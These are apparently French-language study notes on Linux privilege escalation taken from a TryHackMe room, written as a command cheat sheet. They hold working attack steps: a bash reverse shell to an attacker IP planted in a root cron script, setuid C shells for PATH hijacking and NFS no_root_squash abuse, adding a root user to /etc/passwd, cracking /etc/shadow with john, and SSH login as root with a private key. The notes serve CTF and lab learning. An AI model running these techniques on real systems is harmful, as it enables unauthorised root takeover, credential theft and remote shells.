url PrivEsc: https://tryhackme.com/room/linprivesc

url rev shell: [Rev shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

Ce 13/01/2022

Mise a jour ce 26/01/2022
Motif: Complète de notions

**Better rev shell**
`python -c 'import pty; pty.spawn("/bin/bash")'`


<details><summary>Privilege Escalation: Kernel Exploits (exploit de noyaut)
</summary>

Utilisé la commande `uname -a` pour avoir  le noyau du système.
Le noyau peut être vulnérable, rechercher les exploits existant s sur https://www.linuxkernelcves.com/cves
ou exploit-db.
Utilisé   `sudo python -m http.server` pour mettre  votre poste à l'écoute dans le dossier du code à exécuter.
Sur la machine cible, `wget http://@votre_ip:8000/code_shell` (le code doit être compiler depuis votre poste dans le cas échéant comme les codes en C)
</details>





<details><summary>Privilege Escalation: Sudo</summary>


Taper `sudo -l` pour voir vos droits sur les commandes root
Fait recours a [ce ci](https://tryhackme.com/room/linprivesc) cas où cette commande resort la variable d'environnement _environnement LD_PRELOAD._

Avec les commandes sur lesquelles vous avez de droit, une mauvaise configuration peut vous conduit partant de là au **root** 
Vérifier les exploits liés à ces commandes sur [gtfobins](https://gtfobins.github.io/) et devenez root
</details> 



<details><summary>Escalade de privilèges : SUID</summary>



`find / -type f -perm -04000 -ls 2>/dev/null` pour lister les fichiers dont le bit SUID est défini.
[gtfobins](https://gtfobins.github.io/) propose des exploits d'escalde de privilège basé sur ces fichiers dont le bit SUID est definis. Utiliser [ce lient ](https://gtfobins.github.io/#+suid) pour  une liste triée des fichiers dont les SUID sont défini et disposant d'exploit sur GTFOBINS

</details>

<details><summary>Ajout d'un utilisateur root</summary>

Pour les fichier ou commande veuiller copier le chemin absolut qui vous est donné.

Nous pouvons cracker les mots de passe des utilisateurs du fichier `/etc/shadow` avec john, voir le **fichier john the ripper**

_Pour les elévations de privilege, on peut aussi ajouter, un utilisateur root_

Nous aurons besoin de la valeur de hachage du mot de passe que nous voulons que le nouvel utilisateur ait. Cela peut être fait rapidement en utilisant l'outil [openssl](https://www.quennec.fr/trucs-astuces/syst%C3%A8mes/gnulinux/commandes/openssl/openssl-g%C3%A9n%C3%A9rer-des-mots-de-passe-crypt%C3%A9s) sur Kali Linux.

`$ openssl passwd -1 -salt 12345678 MyPasswd`

L'option `-1` précise MD5

sortie:

`$1$12345678$I3fjXxePlXzjbz7gjOzwW0`

_Nous ajouterons ensuite ce mot de passe avec un nom d'utilisateur au /etc/passwd avec la commande nano._

Une fois notre utilisateur ajouté (veuillez noter comment `root:/bin/bash` a été utilisé pour fournir un shell root), nous devrons basculer vers cet utilisateur et, espérons-le, disposer des privilèges root.

_Copier et coller après le mot de passe les derniers catactère de l'ancien root du système pour avoir le format complet_

Ressource: [infinitelogins](https://infinitelogins.com/2021/02/24/linux-privilege-escalation-weak-file-permissions-writable-etc-passwd)

</details>

<details><summary>Escalade de privilèges : PATH (CHEMIN)</summary>


PATH sous Linux est une variable d'environnement qui indique au système d'exploitation où rechercher les exécutables

`echo $PATH` 


Pour exploiter une vulnérabilté liée à cela, vous deviez etre en mesire de repondre favorablement a ces questions:

1 -Quels dossiers sont situés sous $PATH

2 -Votre utilisateur actuel a-t-il des privilèges d'écriture pour l'un de ces dossiers ?

3 -Pouvez-vous modifier $PATH ?

4 -Existe-t-il un script/une application que vous pouvez démarrer et qui sera affecté par cette vulnérabilité ?

Nous utiliserons le script _path_exp.c_ suivant, dans notre cas,_THM_ est un binaire système qui sera lancer par notre script.
On peut reprendre cela typiquement avec n'importe quel binaire ( commande linux )

    #include <unistd.h>

    void main()
    {
        setuid(0);
        setgid(0);
        system("THM");
    }

Compiler en binaire

`gcc path_exp.c -o path -w `


Donner le droit d'exécution

`chmod u+s path`

Une fois exécuté, "path" recherchera un exécutable nommé "THM" dans les dossiers répertoriés sous PATH.

Rechercher si un dossier se situe sous PATH et sur lequel nous disposons de droit d'ecriture.

    find / -writable 2>/dev/null

Comparer la sortie avec celle de _echo $PATH_ et tirer l'intersection.
    `echo $PATH`

Supposons que `/usr` est le dossier sur lequel nous disposons le droit d'ecriture, il pourrait donc être plus facile d'exécuter à nouveau notre recherche de dossiers inscriptibles pour couvrir les sous-dossiers.

    find / -writable 2>/dev/null | grep usr | cut -d "/" -f 2,3 | sort -u

On pouvait utiliser:

    find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

Nous avons ajouté "grep -v proc" pour éliminer les nombreux résultats liés aux processus en cours d'exécution.


Le dossier dans lequel il sera plus facile d'écrire est probablement /tmp. À ce stade, parce que /tmp n'est pas présent dans PATH, 

nous devrons donc l'ajouter. Comme nous pouvons le voir ci-dessous, la commande **export PATH=/tmp:$PATH** accomplit cela.

**/tmp** serait le dossier approprié en cas d'abscence d'autre dossier particulier, souvent dans les ctf.

À ce stade, parce que /tmp n'est pas présent dans PATH, nous devrons donc l'ajouter.

    export PATH=/tmp:$PATH

À ce stade, le script de chemin recherchera également sous le dossier **/tmp** un exécutable nommé « THM »

La création de cette commande est assez simple en copiant _/bin/bash_ dans "THM"  sous le dossier **/tmp**.

    cd /tmp

    echo "/bin/bash" > THM

    chmod 777 THM

    ./path
`./path` pour l'éxécution


Dans le THM, on met toutes commandes que l'on désire exécuter en mode sudo.

Dans le script, on met toujours le nom du fichier contenant la commande

**/tmp** qui suit **$PATH** est le chemain du fichier contenant la commande à exécuter

</details>

<details><summary>Escalade de privilèges : Capabilities (capacités)</summary>


Les « capacités » sont une autre méthode que les administrateurs système peuvent utiliser pour augmenter le niveau de privilège d'un processus ou d'un binaire.Si l'administrateur système ne souhaite pas donner à cet utilisateur des privilèges plus élevés, il peut modifier les capacités du binaire. En conséquence, le binaire accomplirait sa tâche sans avoir besoin d'un utilisateur de privilège plus élevé.

Nous pouvons utiliser l'outil `getcap` pour répertorier les capacités activées.

`getcap -r / 2>/dev/null`

Veuillez noter que ni **vim** ni sa copie n'ont le bit SUID défini. Ce vecteur d'élévation de privilèges n'est donc pas détectable lors de l'énumération des fichiers recherchant le SUID.

l'apparition de `vim` dans ces fichier est une mine d'or.
Consulter[gtfobins](https://gtfobins.github.io/) partie capacité pour l'exploit.


</details>

<details><summary>Escalade de privilèges : tâches Cron</summary>

Les tâches Cron sont utilisées pour exécuter des scripts ou des binaires à des moments spécifiques. Par défaut, ils s'exécutent avec le privilège de leurs propriétaires et non de l'utilisateur actuel.
Les configurations de tâche cron sont stockées sous forme de crontabs (tables cron) pour voir l'heure et la date de la prochaine exécution de la tâche. Comme vous pouvez vous y attendre, notre objectif sera de trouver une tâche cron définie par root et de lui faire exécuter notre script, idéalement un shell.
Tout utilisateur peut lire le fichier en conservant les tâches cron à l'échelle du système sous
` /etc/crontab`
Analysé les fichiers et choisissez lequel s'execute le lpus souvent (souvent les fichier de script). Comme notre utilisateur actuel peut accéder à ce script, nous pouvons facilement le modifier pour créer un shell inversé, espérons-le avec les privilèges root.

Le script utilisera les outils disponibles sur le système cible pour lancer un reverse shell.
Deux points à noter ;

1- La syntaxe de la commande variera en fonction des outils disponibles. (par exemple nc, ne prendra probablement pas en charge l' -eoption que vous avez peut-être vue utilisée dans d'autres cas)
2- Nous devrions toujours préférer démarrer des shells inversés, car nous ne voulons pas compromettre l'intégrité du système lors d'un véritable engagement de test d'intrusion.

Mettez votre marchien à l'écoute avec `nc -lnvp mon_port`

Le fichier contiendra: `bash -i >& /dev/tcp/@mon_ip/mon_port 0>&1`

</details>


<details><summary>Escalade de privilèges: NFS (Network File Sharing)
</summary>

Un autre vecteur qui est plus pertinent pour les CTF et les examens est un shell réseau mal configuré. Ce vecteur peut parfois être vu lors des missions de test d'intrusion lorsqu'un système de sauvegarde réseau est présent.
La configuration NFS (Network File Sharing) est conservée dans le fichier `/etc/exports` . Ce fichier est créé lors de l'installation du serveur NFS et peut généralement être lu par les utilisateurs.
 (`cat /etc/exports `)
L'élément critique pour ce vecteur d'escalade de privilèges est l'option "`no_root_squash`" que vous pouvez voir ci-dessus. 

En cas de présence de cette option (`no_root_squash`), confert le champ d'exploitation sur [tryhackme](https://tryhackme.com/room/linprivesc)

**Enumérer les fichiers partagés montable**   `showmont -e @ip_server`

Nous allons monter l'un des partages "no_root_squash" sur notre machine attaquante et commencer à construire notre exécutable.

Nous créons notre dossier local sur la machine attaquante.. `mkdir /tmp/backupattker` 

Monté le le repertoir créer sous le repertoir vulnérable du serveueur (backups dans notre cas)

`mount -o rw @ip_serveur:/backups /tmp/backupattker` ou 

`mount -t nfs4 -o vers=4 @ip/tmp /tmp/backupattker `

Avec l'éxécution du binnaire `/bin/bash`  le compte sera réglé. Pour cela, on utilise ce petit programme (shell.c) dans notre repertoir de partage crée.

    #include <unistd.h>

    void main()
    {
        setuid(0);
        setgid(0);
        system("/bin/bash");
    }
compilé: `gcc shell.c -o shell -w`

Définis le bit SUID: `chmod +s shell`

Se déplacer dans le dossier concerné de la cible et éxécuté le shell avec `./shell` 

</details>

<details><summary>Craker un mot de passe linux</summary>

On enrégistre toutes la ligne dans un fichier pas.txt, nous utilisons john comme suit:

Le fichier passwd et shadow en local et lancer:

`sudo unshadow passwd.txt shadow.txt > crackme.txt `

`john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt`

`john --wordlist=/usr/share/wordlists/rockyou.txt pas.txt`

</details>


<details><summary>find</summary>


find . -name flag1.txt: find the file named “flag1.txt” in the current directory

find /home -name flag1.txt: find the file names “flag1.txt” in the /home directory

find / -type d -name config: find the directory named config under “/”

find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)

find / -perm a=x: find executable files
find /home -user frank: find all files for user “frank” under “/home”

find / -mtime 10: find files that were modified in the last 10 days

find / -atime 10: find files that were accessed in the last 10 day

find / -cmin -60: find files changed within the last hour (60 minutes)

find / -amin -60: find files accesses within the last hour (60 minutes)

find / -size 50M: find files with a 50 MB size

</details>

<details><summary>Xterm vulns</summary>

    export TERM=xtrem

    /usr/bin/screen -x root/root

</details>

<details><summary>Echappe chroot() avec ssh et connexion ssh avec private key</summary>


`ssh -i /root/.ssh/id_rsa -o StrictHostKeyChecking=no root@localhost`

</details>

<details><summary>Se connecter avec clé privée via ssh</summary>

Donc on a normalement :

`ssh -i /root/.ssh/id_rsa -o StrictHostKeyChecking=no root@localhost`


`StrictHostKeyChecking=no` désactive la vérification stricte de la clé.

`/root/.ssh/id_rsa` le chemain de la clé sur la cible

</details>









